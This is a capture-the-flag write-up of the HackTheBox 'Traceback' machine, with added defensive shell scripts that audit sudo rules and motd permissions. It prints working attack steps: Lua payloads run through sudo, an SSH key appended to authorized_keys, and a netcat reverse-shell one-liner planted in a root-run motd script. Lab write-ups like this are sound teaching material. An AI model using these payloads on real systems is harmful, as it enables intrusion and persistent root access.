Started the box by enumerating services on the machine using nmap. The scan returned only http and ssh, neither of which looked that interesting.
# Nmap 7.80 scan initiated Wed May 20 06:40:09 2020 as: nmap -sV -sT -oN nmap 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.094s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 06:40:21 2020 -- 1 IP address (1 host up) scanned in 11.59 seconds
Going to http://10.10.10.181, the website had already been owned by Xh4H, and the hacker claimed to have left a backdoor somewhere.
Running directory bruteforcing using Daniel Miessler's wordlists returned zero results. However, upon checking the page source, there was a comment saying "Some of the best web shells that you might need". Throwing that string into Google took me to a GitHub repo https://github.com/TheBinitGhimire/Web-Shells.
Going through the list of backdoors, http://10.10.10.181/smevk.php returned an HTTP 200 OK. Using the default credentials admin:admin, I was able to gain access to the webshell.
The webshell's interface was really ugly, but it was sufficient to do some basic enumeration.
# Determine user
$ whoami
webadmin
# Check home directory
$ ls -a /home/webadmin
. .. .bash_history .bash_logout .bashrc .cache .local .luvit_history .profile .ssh note.txt
# Read note.txt
$ cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
# List user privileges
$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
Looking through the results, it seems /home/sysadmin/luvit can be executed as the user sysadmin without supplying a password (NOPASSWD).
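A sudo rule like this is worth catching before an attacker does: an interpreter run as another user can spawn any command, so the rule is equivalent to granting a shell. As an added example (not from the original writeup), here is a small POSIX sh audit that reads sudo -l output and flags rules whose command is a script runtime or lives under a home directory; the second rule in the sample input is constructed for contrast.

```shell
#!/bin/sh
# Added example, not part of the original writeup: review `sudo -l` output for
# rules that hand out a scripting runtime or a shell. An interpreter such as
# luvit, lua, python or perl can spawn arbitrary commands (io.popen, os.execute,
# subprocess), so "(sysadmin) NOPASSWD: /home/sysadmin/luvit" is effectively
# "(sysadmin) NOPASSWD: ALL".

# Basenames whose presence in a rule makes it effectively unrestricted.
RISKY_BASENAMES='luvit lua luajit python python2 python3 perl ruby node sh bash dash zsh'

# Read `sudo -l` output on stdin. For each rule line "(runas) [TAG: ...] command"
# that is risky, print "<runas><TAB><command><TAB><reasons>".
audit_sudo_rules() {
    while IFS= read -r line; do
        line=${line#"${line%%[![:space:]]*}"}   # drop leading indentation
        case "$line" in
            \(*\)*) ;;                           # rule lines start with "(runas)"
            *) continue ;;                       # Defaults/header lines
        esac
        runas=${line#\(}; runas=${runas%%\)*}
        rest=${line#*\)}
        # Strip tags such as "NOPASSWD:" or "SETENV:"; keep the command and its arguments.
        cmd=$(printf '%s\n' "$rest" | sed 's/^[[:space:]]*\([A-Z_]*:[[:space:]]*\)*//')
        prog=${cmd%% *}
        base=${prog##*/}
        reason=''
        if [ "$prog" = ALL ]; then reason='all-commands'; fi
        for r in $RISKY_BASENAMES; do
            if [ "$base" = "$r" ]; then reason='interpreter-or-shell'; fi
        done
        case "$prog" in                          # a binary in a home dir is controlled by that user
            /home/*) reason="${reason:+$reason,}binary-under-home" ;;
        esac
        if [ -n "$reason" ]; then printf '%s\t%s\t%s\n' "$runas" "$cmd" "$reason"; fi
    done
}

# Constructed sample: the rule from the box plus one benign rule added for contrast.
SAMPLE_SUDO_L='Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) NOPASSWD: /usr/bin/systemctl restart apache2'

# Stand-alone run; prints: sysadmin<TAB>/home/sysadmin/luvit<TAB>interpreter-or-shell,binary-under-home
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_rules
```

On a real host, pipe sudo -l (or sudo -l -U user for each account) into audit_sudo_rules; the fix for a flagged rule is to grant a specific wrapper script owned by root instead of the interpreter itself.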
I had never written a single line of Lua code before, and after some googling it turned out that Luvit is a runtime environment for Lua.
Reading through the documentation, I tried to craft a Lua payload that would be executed as sysadmin.
The following Lua code lists the files in /home/sysadmin:
directory='/home/sysadmin/'
pfile = io.popen('ls -a "'..directory..'"')
for filename in pfile:lines() do
print(filename)
end
To execute this piece of code, I simply had to write it somewhere on the box and run it with luvit. To do so, I echoed the code to /tmp/ on the box and ran it.
$ echo "directory='/home/sysadmin/';pfile = io.popen('ls -a \"'..directory..'\"');for filename in pfile:lines() do;print(filename);end" > /tmp/listdir.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/listdir.lua
. .. .bash_history .bash_logout .bashrc .cache .local .profile .ssh luvit user.txt
Modifying the payload to print /home/sysadmin/user.txt, I got my first flag.
$ echo "pfile = io.popen('cat /home/sysadmin/user.txt');for filename in pfile:lines() do;print(filename);end" > /tmp/getflag.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/getflag.lua
{{FLAG}}
Enumerating sysadmin's home folder, I found the .ssh folder with the authorized_keys file. Adding my public key to this file should grant me SSH access to the box as sysadmin.
Using ssh-keygen, I created a new SSH keypair. The following payload appends my public key to the list of authorized keys.
$ echo "io.popen(\"echo '{{PUBLIC KEY}}' >> /home/sysadmin/.ssh/authorized_keys\")" > /tmp/ssh.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/ssh.lua
I SSH-ed into the box using ssh -i PRIVATE_KEY sysadmin@10.10.10.181 and was greeted by a message from Xh4H and a shell.
➜ ~ ssh -i PRIVATE_KEY sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
$
Privilege escalation from sysadmin to root was somewhat tricky. I tried looking for files with incorrect permissions or SUID binaries but found nothing. However, looking through the list of processes using ps -aux, there was a command being executed as root that seemed to be running at intervals.
root 3851 0.0 0.0 4628 772 ? Ss 19:15 0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
The command restores a backup of the update-motd.d scripts. On Ubuntu these scripts generate the message of the day (motd): pam_motd runs them as root each time a user logs in and prints their output as a greeting, which is how the message from Xh4H appeared when SSH-ing into the box.
Looking through /etc/update-motd.d/, there were several scripts, and the first one, /etc/update-motd.d/00-header, contained echo "\nWelcome to Xh4H land \n", which was the greeting upon logging into the box. Because the script could be modified as sysadmin, this could be abused by adding commands to it, which would then run as root upon the next login.
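The defensive check for this is simple: nothing in /etc/update-motd.d may be writable by anyone but root. As an added example (not from the original writeup), here is a POSIX sh function that lists group- or world-writable motd scripts, together with a constructed fixture that reproduces the misconfiguration for testing; the fixture's second script name is made up.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit /etc/update-motd.d.
# pam_motd runs every script in that directory as root on each login, so a
# script there that a non-root user can write is a root-level foothold.
# Only POSIX shell plus find/chmod/mktemp are used.

# Print DIR (default /etc/update-motd.d) if it is group- or world-writable, then
# every regular file directly inside it that is group- or world-writable.
find_writable_motd_scripts() {
    dir=${1:-/etc/update-motd.d}
    if [ ! -d "$dir" ]; then
        echo "no such directory: $dir" >&2
        return 2
    fi
    # Mode bit 020 = group write, 002 = other write; -perm -MODE means "all of these bits set".
    find "$dir" -maxdepth 0 \( -perm -020 -o -perm -002 \) -print
    find "$dir" -mindepth 1 -maxdepth 1 -type f \( -perm -020 -o -perm -002 \) -print | sort
}

# Constructed fixture mimicking the scripts on the box: 00-header is left
# group-writable (the misconfiguration), 99-footer (made-up name) has sane
# permissions. Prints the fixture path; the caller removes it.
make_sample_motd_dir() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho "\\nWelcome to Xh4H land \\n"\n' > "$d/00-header"
    printf '#!/bin/sh\necho "footer"\n' > "$d/99-footer"
    chmod 0755 "$d"
    chmod 0775 "$d/00-header"      # g+w: flagged
    chmod 0755 "$d/99-footer"      # clean
    printf '%s\n' "$d"
}

# Stand-alone demo. On a real host call find_writable_motd_scripts with no
# argument; anything it prints should get chown root:root and chmod go-w.
demo_dir=$(make_sample_motd_dir)
find_writable_motd_scripts "$demo_dir"      # prints only .../00-header
rm -rf "$demo_dir"
```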
I set up a reverse shell listener on port 1337 on my local machine. Afterwards, I edited /etc/update-motd.d/00-header to set up a netcat reverse shell connector.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{ipaddr}} 1337 >/tmp/f; echo "\nWelcome to Xh4Hland \n"
In a different window, SSH into the box and monitor the reverse shell listener. Note that it may take a few tries, since the motd scripts get overwritten every 30 seconds by the root process seen above. If timed correctly, you should have a root shell. Navigate to /root to grab the root flag.
$ cat /root/root.txt
{{FLAG}}